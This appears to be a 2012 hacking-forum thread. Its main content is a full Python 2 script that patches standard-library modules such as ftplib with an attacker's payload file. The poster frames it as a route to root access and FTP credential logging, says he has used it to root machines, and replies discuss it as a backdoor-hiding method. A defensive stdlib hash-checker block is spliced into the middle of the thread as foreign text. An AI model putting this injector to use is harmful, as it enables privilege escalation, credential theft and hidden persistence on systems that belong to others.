Author Topic: [Python] Python Module Infection  (Read 1860 times)


Offline Zer0Flag

[Python] Python Module Infection
« on: June 20, 2012, 08:49:58 pm »
Hello,
 
 I recognized that you can modify default Python modules like "ftplib" and there are no checks whether the module got modified, and through that you can inject code which gets executed by all scripts which use the modified function. For example this could be used to execute code with admin rights even if your user doesn't have these rights. Or to log FTP connections (user, passwd, host, port...) and a lot more. I didn't find anything about this issue on Google and I don't know if this is a known issue.
 
 I created a small script which helps to inject your code for testing purposes.
Code:
#!/usr/bin/python
#
# Coder   : Zer0Flag
# Date    : 18.06.2012
# Contact : zer0fl4g@googlemail.com
#
# Usage   : PyRTInfect.py -l <file you want inject into> -f <function you want inject into> -c <file you want to inject>
#           PyRTInfect.py -l <file you want to clean>
#
# Example : PyRTInfect.py -l C:\Python2.7\Lib\ftplib.py -f login -c C:\MyEvilPayload.py
#           PyRTInfect.py -l /usr/lib/python2.6/ftplib.py -f login -c /home/MyEvilPayload.py
#
# Tested  : Windows XP SP3 @ Python 2.7
#           Windows 7 SP1 @ Python 2.7
#           BackTrack 5 @ Python 2.6
#

import sys

def PrintUsage():
    print 'Usage:\n\t%s -l <file> -f <function> -c <file.to.inject>' % sys.argv[0]
    print '\t%s -l <file>\t#Clear all Injections' % sys.argv[0]
       
def InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject):
    if len(sFileToInfect) != 0 and len(sFunctionToInfect) != 0 and len(sFileToInject) != 0:
        sFTI = open(sFileToInfect,'r+')
        sFTIn = open(sFileToInject,'r+')
       
        bGoOn = True
        bWriteData = True
        iLineCounter = 0
        IWCount = 0
        sBackUpTFI = sFTI.readlines()
        sFTI.seek(0)
       
        while bGoOn:
            iLineCounter += 1
            sLine = sFTI.readline()
            if not sLine:
                # EOF reached without finding the function: stop instead of looping forever
                print '[-] Function: \"%s\" not found in %s' % (sFunctionToInfect,sFileToInfect)
                break
            if str(sLine).__contains__('def ' + sFunctionToInfect):
                print '[+] Function: \"%s\" found at %d' % (sFunctionToInfect,iLineCounter)
                print '[+] Going to Inject following lines!\n'
                sLinesToInject = sFTIn.readlines()
                for sLTI in sLinesToInject:
                    print sLTI
                   
                sFTI.seek(0)
                while bWriteData:
                    try:
                        sFTI.write(sBackUpTFI[IWCount])
                        if IWCount == iLineCounter:
                            sFTI.write('\t#1:Injected\n')
                            sFTI.writelines(sLinesToInject)
                            sFTI.write('\n\t#2:Injected\n')
                        IWCount += 1
                    except IndexError,e:
                        bWriteData = False
                bGoOn = False
       
        sFTI.close()
        sFTIn.close()
    else:
        return 0
    return 1

def ClearRTFile(sFileName):
    fRTFile = open(sFileName,'r+')
    fBackUp = fRTFile.readlines()
    fRTFile.seek(0)
    bWriteOk = True
    iCounter = 0
   
    for sLine in fBackUp:
        if str(sLine).__contains__('#1:Injected'):
            bWriteOk = False
            print '[+] Injected Line Found at %d' % iCounter
        elif str(sLine).__contains__('#2:Injected'):
            bWriteOk = True
            continue
           
        if bWriteOk:
            fRTFile.write(sLine)
        iCounter += 1
    fRTFile.truncate()   # the rewritten file is shorter; drop the stale tail left behind
    fRTFile.close()
    return 1

if __name__ == "__main__":
    if len(sys.argv) < 3:
        PrintUsage()
    elif len(sys.argv) == 3:
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                ClearRTFile(sys.argv[i + 1])               
    elif len(sys.argv) == 7:
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                sFileToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-f':
                sFunctionToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-c':
                sFileToInject = sys.argv[i + 1]
               
        if InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject) == 0:
            PrintUsage()


~Zer0

Offline flowjob

Re: [Python] Python Module Infection
« Reply #1 on: June 20, 2012, 10:02:44 pm »
This is not really a security leak, as you only change the code on your local computer.
So e.g. you would only log the FTP data you entered on your computer...

Sometimes you may want to change a few lines of the original libs too, because something doesn't work...

Offline Zer0Flag

Re: [Python] Python Module Infection
« Reply #2 on: June 20, 2012, 10:12:42 pm »
Well, but e.g. when you've got access to a root and you see that the admin uses a backup Python script, you could inject into the used functions and get your code executed with root rights. So I think it is a fail from Python not to check whether the local libs got modified. A little CRC check when the libs get imported, and a warning to the user that he should be careful, would be nice and easy to implement...

~Zer0

Offline Kulverstukas

Re: [Python] Python Module Infection
« Reply #3 on: June 20, 2012, 11:05:16 pm »
But the CRC check could be passed just as easily... all checksums would have to be stored somewhere in order to compare them. You could then generate your own checksums and just replace them.
Using online checks is kinda not an option here because it would generate unwanted traffic. Also, checking the integrity of those libs on each start would really decrease the speed. Imagine if some user has thousands of those libs...
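An integrity baseline of the kind debated in Reply #2 and Reply #3, as an added example that is not part of this thread: it records the SHA-256 of every .py file under the interpreter's stdlib directory and, on a later run, reports files that were modified, added or removed, so an edited ftplib.py shows up as MODIFIED. The output file name baseline.json is an assumption.

```python
import hashlib
import json
import os
import sys
import sysconfig

def hash_file(path):
    """SHA-256 of a file's raw bytes, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    """Map every .py file below root (path relative to root) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".py"):
                full = os.path.join(dirpath, name)
                manifest[os.path.relpath(full, root)] = hash_file(full)
    return manifest

def verify_manifest(root, baseline):
    """Compare the tree under root with a stored baseline.
    Returns (modified, added, removed) as sorted lists of relative paths."""
    current = build_manifest(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    return modified, added, removed

if __name__ == "__main__":
    # baseline.json is an assumed file name; keep it read-only or off the box,
    # otherwise whoever can edit ftplib.py can regenerate the baseline as well.
    stdlib = sysconfig.get_paths()["stdlib"]
    if len(sys.argv) < 2:
        sys.exit("usage: %s baseline.json [--check]" % sys.argv[0])
    if "--check" in sys.argv:
        with open(sys.argv[1]) as fh:
            report = verify_manifest(stdlib, json.load(fh))
        for label, items in zip(("MODIFIED", "ADDED", "REMOVED"), report):
            for p in items:
                print(label, p)
    else:
        with open(sys.argv[1], "w") as fh:
            json.dump(build_manifest(stdlib), fh, indent=1, sort_keys=True)
```

Only .py sources are hashed; the cached .pyc files under __pycache__ (or next to the sources on Python 2) are loaded when present and would need the same treatment. As the reply above notes, the baseline is only worth something if the person who can edit the libs cannot also rewrite it, so it belongs on read-only media or another host.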

Offline Zer0Flag

Re: [Python] Python Module Infection
« Reply #4 on: June 21, 2012, 12:06:46 am »
I didn't say that CRC checks would be the ultimate protection; also, there is always a way to bypass the checks. But just as it is, it's dangerous to use py scripts on your roots... (And no, I don't have anything against py! I love it!)

~Zer0

Offline LeXeL

Re: [Python] Python Module Infection
« Reply #5 on: July 06, 2012, 03:45:23 pm »
Also if the application is already running? I mean you will need to reload the application to import the lib again, and then the code gets executed...

Offline Zer0Flag

Re: [Python] Python Module Infection
« Reply #6 on: July 06, 2012, 11:40:35 pm »
Sure, they need to be reloaded to import the infected module. But just think about a backup script in .py which stores the .tar.gz on an FTP... and the script needs to be executed with admin rights to access all folders which need to be saved...

Sure, those are a lot of conditions which need to be true for a successful attack, but I already used this several times to get root access on a box and I think it's very dangerous.

~Zer0Flag

Offline Kulverstukas

Re: [Python] Python Module Infection
« Reply #7 on: July 07, 2012, 08:14:48 am »
It might be dangerous, but only with the right conditions. Therefore it degrades to "don't care" for a general rating.

Offline LeXeL

Re: [Python] Python Module Infection
« Reply #8 on: July 07, 2012, 05:41:20 pm »
I thought of this a long time ago as a way to hide backdoors on a system, good job... but what happens if the user updates Python? Or the whole system?
« Last Edit: July 07, 2012, 05:42:50 pm by LeXeL »

Offline techb

Re: [Python] Python Module Infection
« Reply #9 on: July 09, 2012, 03:51:24 am »
Quote from: LeXeL on July 07, 2012, 05:41:20 pm
I thought of this a long time ago as a way to hide backdoors on a system, good job... but what happens if the user updates Python? Or the whole system?

Most people are still using Python 2.* because there isn't a whole lot of third-party support for 3.

The idea is almost good, but even though Python is popular, PHP is used a lot more and it would be better to infect something like PHP.

Interpreted things aren't really a good target though.